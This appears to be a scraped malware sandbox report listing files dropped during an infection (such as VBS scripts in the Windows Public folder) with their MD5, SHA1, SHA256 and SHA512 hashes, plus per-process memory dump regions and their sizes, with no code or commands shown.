MD5
abe7d5111373b0fceee0645a7a3b2a72

SHA1
6f823004a0bfe809f76a1a1b7fe5c4540b66ca08

SHA256
b3a20de353ec091af57f9c6909a2cb613fadcdd1e5df6155a0e28fe4020c21fb

SHA512
ec4693555f35dcc9f39f070eb94c69abac8f42c806a97c2076e6c54b3513ccc5b1581b340a4d9c97b5b4cf05c8caf5ce3260f739ccd1fcf80ef10b829fe91068

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
abe7d5111373b0fceee0645a7a3b2a72

SHA1
6f823004a0bfe809f76a1a1b7fe5c4540b66ca08

SHA256
b3a20de353ec091af57f9c6909a2cb613fadcdd1e5df6155a0e28fe4020c21fb

SHA512
ec4693555f35dcc9f39f070eb94c69abac8f42c806a97c2076e6c54b3513ccc5b1581b340a4d9c97b5b4cf05c8caf5ce3260f739ccd1fcf80ef10b829fe91068

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
abe7d5111373b0fceee0645a7a3b2a72

SHA1
6f823004a0bfe809f76a1a1b7fe5c4540b66ca08

SHA256
b3a20de353ec091af57f9c6909a2cb613fadcdd1e5df6155a0e28fe4020c21fb

SHA512
ec4693555f35dcc9f39f070eb94c69abac8f42c806a97c2076e6c54b3513ccc5b1581b340a4d9c97b5b4cf05c8caf5ce3260f739ccd1fcf80ef10b829fe91068

Download Submit
C:\Users\Public\SiggiaW.vbs
MD5
552bd91430a1338b61b48ebbe2e6777f

SHA1
00fc1370a965a49522ca47ceb607f20434453c85

SHA256
c3d618fc10777dc03a98f892ca3a49e2eda96bb72a9392007e1be7257aaa96ad

SHA512
0f27f7629c21fde76679a8a7492d846a7affcb9ed5efb7f7765488069b9e93b4e0cc45e3f79ed481aa923176ceea2fd04d9eb8e820c355de607a678e61254b39

Download Submit
C:\Users\Public\bin.vbs
MD5
9b7d7275f08bdc79397f5a25f5be8e23

SHA1
d933fd01e7061d38143f356688cb979961e814ed

SHA256
cfbb249ca33f5df6b203db24b51a9f34241603440478c146efc19ff317b0a480

SHA512
75ce7fa20fdeaa4cb0d775c2581b890ac929c6c57cd2457e99a2257e3a0d566571022f76959f6960bfbed6addb116eca91157b40c653a65f538d2d76fdaf9ae2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/284-33-0x0000000002940000-0x0000000002944000-memory.dmp

Filesize
16KB

Download
memory/284-28-0x0000000000000000-mapping.dmp

Download
memory/896-32-0x0000000000000000-mapping.dmp

Download
memory/896-203-0x0000000002680000-0x0000000002684000-memory.dmp

Filesize
16KB

Download
memory/900-10-0x0000000000000000-mapping.dmp

Download
memory/960-209-0x000000001AE00000-0x000000001AE02000-memory.dmp

Filesize
8KB

Download
memory/960-207-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/960-213-0x000000001AE04000-0x000000001AE06000-memory.dmp

Filesize
8KB

Download
memory/1096-29-0x00000000028D0000-0x00000000028D4000-memory.dmp

Filesize
16KB

Download
memory/1096-18-0x0000000000000000-mapping.dmp

Download
memory/1100-8-0x0000000001E40000-0x0000000001E41000-memory.dmp

Filesize
4KB

Download
memory/1100-3-0x0000000071191000-0x0000000071193000-memory.dmp

Filesize
8KB

Download
memory/1100-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1100-11-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1100-2-0x0000000074101000-0x0000000074105000-memory.dmp

Filesize
16KB

Download
memory/1100-7-0x0000000001E40000-0x0000000001E41000-memory.dmp

Filesize
4KB

Download
memory/1104-50-0x000000001ACA0000-0x000000001ACA2000-memory.dmp

Filesize
8KB

Download
memory/1104-40-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/1104-51-0x000000001ACA4000-0x000000001ACA6000-memory.dmp

Filesize
8KB

Download
memory/1148-6-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download
memory/1148-5-0x0000000000000000-mapping.dmp

Download
memory/1172-55-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/1172-61-0x000000001AC00000-0x000000001AC02000-memory.dmp

Filesize
8KB

Download
memory/1172-62-0x000000001AC04000-0x000000001AC06000-memory.dmp

Filesize
8KB

Download
memory/1384-17-0x00000000760C1000-0x00000000760C3000-memory.dmp

Filesize
8KB

Download
memory/1384-16-0x0000000000000000-mapping.dmp

Download
memory/1468-12-0x000007FEF6010000-0x000007FEF628A000-memory.dmp

Filesize
2.5MB

Download
memory/1580-14-0x0000000000000000-mapping.dmp

Download
memory/1608-135-0x000000001A980000-0x000000001A981000-memory.dmp

Filesize
4KB

Download
memory/1608-85-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1608-89-0x00000000027B0000-0x00000000027B1000-memory.dmp

Filesize
4KB

Download
memory/1608-53-0x000000001ACA0000-0x000000001ACA2000-memory.dmp

Filesize
8KB

Download
memory/1608-54-0x000000001ACA4000-0x000000001ACA6000-memory.dmp

Filesize
8KB

Download
memory/1608-44-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/1608-138-0x000000001A990000-0x000000001A991000-memory.dmp

Filesize
4KB

Download
memory/1996-112-0x00000000028C0000-0x00000000028C4000-memory.dmp

Filesize
16KB

Download
memory/1996-23-0x000000001AD00000-0x000000001AD02000-memory.dmp

Filesize
8KB

Download
memory/1996-39-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1996-21-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/1996-35-0x000000001B950000-0x000000001B951000-memory.dmp

Filesize
4KB

Download
memory/1996-15-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/1996-113-0x000000001ACF0000-0x000000001ACF2000-memory.dmp

Filesize
8KB

Download
memory/1996-27-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/1996-22-0x000000001AD80000-0x000000001AD81000-memory.dmp

Filesize
4KB

Download
memory/1996-25-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/1996-24-0x000000001AD04000-0x000000001AD06000-memory.dmp

Filesize
8KB

Download
memory/1996-116-0x000000001B750000-0x000000001B762000-memory.dmp

Filesize
72KB

Download
memory/2084-192-0x000000001AC04000-0x000000001AC06000-memory.dmp

Filesize
8KB

Download
memory/2084-188-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2084-191-0x000000001AC00000-0x000000001AC02000-memory.dmp

Filesize
8KB

Download
memory/2132-71-0x000000001AEE4000-0x000000001AEE6000-memory.dmp

Filesize
8KB

Download
memory/2132-66-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2132-70-0x000000001AEE0000-0x000000001AEE2000-memory.dmp

Filesize
8KB

Download
memory/2260-93-0x000000001AC00000-0x000000001AC02000-memory.dmp

Filesize
8KB

Download
memory/2260-80-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2260-95-0x000000001AC04000-0x000000001AC06000-memory.dmp

Filesize
8KB

Download
memory/2356-196-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2356-202-0x000000001A9B4000-0x000000001A9B6000-memory.dmp

Filesize
8KB

Download
memory/2356-201-0x000000001A9B0000-0x000000001A9B2000-memory.dmp

Filesize
8KB

Download
memory/2392-101-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2392-114-0x000000001AC60000-0x000000001AC62000-memory.dmp

Filesize
8KB

Download
memory/2392-117-0x000000001AC64000-0x000000001AC66000-memory.dmp

Filesize
8KB

Download
memory/2628-141-0x000000001AE80000-0x000000001AE82000-memory.dmp

Filesize
8KB

Download
memory/2628-134-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2628-142-0x000000001AE84000-0x000000001AE86000-memory.dmp

Filesize
8KB

Download
memory/2656-174-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/2656-131-0x00000000004376DE-mapping.dmp

Download
memory/2656-145-0x0000000072F00000-0x00000000735EE000-memory.dmp

Filesize
6.9MB

Download
memory/2656-130-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/2656-215-0x00000000048B1000-0x00000000048B2000-memory.dmp

Filesize
4KB

Download
memory/2656-166-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/2800-163-0x000000001A874000-0x000000001A876000-memory.dmp

Filesize
8KB

Download
memory/2800-158-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2800-161-0x000000001A870000-0x000000001A872000-memory.dmp

Filesize
8KB

Download
memory/2980-183-0x000000001AB14000-0x000000001AB16000-memory.dmp

Filesize
8KB

Download
memory/2980-177-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

Filesize
9.9MB

Download
memory/2980-182-0x000000001AB10000-0x000000001AB12000-memory.dmp

Filesize
8KB

Download